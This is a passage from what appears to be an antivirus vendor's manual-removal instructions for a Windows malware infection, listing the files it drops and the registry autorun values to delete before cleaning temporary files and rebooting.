%Program Files%\58NPSAZXWZ\cast.config (37 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\VVCGZWYRXT\SecondL.exe.config (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\VVCGZWYRXT\OneTwo.exe.config (1 bytes)
C:\config.conf (47 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\VVCGZWYRXT\up.exe (145806 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\VVCGZWYRXT\up.exe.config (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-L003T.tmp\itdownload.dll (1489 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-L003T.tmp\idp.dll (1502 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-L003T.tmp\psvince.dll (88 bytes) - Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"HJ2O0Z2VCIVQCDU" = "%Program Files%\58NPSAZXWZ\58NPSAZXW.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"OMEWPRODUCT_A1904" = "C:\%original file name%.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"4147223" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\20ehjizk4kl\wyrm4bnfuck.exe /VERYSILENT" - Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
*Manual removal may cause unexpected system behaviour and should be performed at your own risk.